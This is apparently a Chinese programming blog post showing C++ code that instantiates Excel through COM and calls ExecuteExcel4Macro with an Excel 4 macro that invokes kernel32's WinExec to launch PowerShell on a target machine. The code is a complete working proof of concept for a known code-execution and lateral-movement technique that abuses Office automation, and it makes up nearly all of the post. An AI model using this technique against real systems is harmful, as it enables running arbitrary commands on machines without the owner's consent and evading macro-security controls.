C++通过DCOM调用Excel.ExecuteExcel4Macro执行宏代码

通过cpp调用excel.application对象的ExecuteExcel4Macro方法来执行任意宏代码,
宏代码直接调用NativeAPI执行WinExec创建powershell进程

要求:目标机器必须安装了Excel,

#include "stdafx.h"
#include <windows.h>
#include <iostream>
#include <oaidl.h>
using namespace std;

int _tmain(int argc, _TCHAR* argv[])
{
	HRESULT hRet = E_FAIL;
	CLSID CLSID_excel;
	IDispatch *pXlApp;
	DISPID dispidNamed = DISPID_PROPERTYPUT;
	DISPID dispID;
	DISPPARAMS dispParams = { NULL, NULL, 0, 0 }; // 
	do 
	{
		CoInitialize(NULL);

		hRet = CLSIDFromProgID(L"Excel.Application", &CLSID_excel);
		if (FAILED(hRet))
		{
			break;
		}

		hRet = CoCreateInstance(CLSID_excel, NULL, CLSCTX_LOCAL_SERVER, IID_IDispatch, (void **)&pXlApp);
		if (FAILED(hRet))
		{
			break;
		}

		// 根据名字获取方法ID
		OLECHAR* szFuncName = L"ExecuteExcel4Macro";
		hRet = pXlApp->GetIDsOfNames(IID_NULL, &szFuncName, 1, LOCALE_SYSTEM_DEFAULT, &dispID);
		if (FAILED(hRet))
		{
			break;
		}

		dispParams.cArgs = 1;
		dispParams.cNamedArgs = 0;
		dispParams.rgdispidNamedArgs = NULL;
		dispParams.rgvarg = new VARIANTARG;
		dispParams.rgvarg->vt = VT_BSTR;
		dispParams.rgvarg->bstrVal = SysAllocString(L"call(\"kernel32\", \"WinExec\", \"JFJ\", \"powershell\", 5)");



		hRet = pXlApp->Invoke(dispID, IID_NULL, LOCALE_SYSTEM_DEFAULT, DISPATCH_METHOD, &dispParams, NULL, NULL, NULL);
		if (FAILED(hRet))
		{
			break;
		}

		SysFreeString(dispParams.rgvarg->bstrVal);
		delete dispParams.rgvarg;
		CoUninitialize();


	} while (false);
	

	return 0;
}


  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值